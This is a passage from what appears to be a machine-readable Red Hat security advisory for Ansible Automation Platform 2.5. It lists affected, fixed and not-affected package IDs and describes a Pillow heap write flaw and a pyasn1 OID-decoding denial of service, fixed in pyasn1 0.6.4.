"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Native heap out-of-bounds write"
},
{
"cve": "CVE-2026-59885",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-14T18:17:12.157807+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500380"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pyasn1, a Python library for Abstract Syntax Notation One (ASN.1). The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A remote attacker could exploit this by providing a specially crafted payload containing an OID with many arcs, leading to excessive CPU consumption and a denial of service (DoS) in applications that decode untrusted ASN.1 data. The corresponding encoders also exhibit this quadratic behavior when re-encoding attacker-supplied values.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: python-pyasn1: pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in pyasn1. The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A small crafted payload containing an OID with many arcs consumes excessive CPU per decode() call, allowing denial of service in applications that decode untrusted ASN.1 data (certificates, LDAP, SNMP, Kerberos). The corresponding encoders exhibit the same behavior when re-encoding attacker-supplied values. The arc-size limit introduced for CVE-2026-23490 does not mitigate this issue. This issue is fixed in pyasn1 version 0.6.4.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
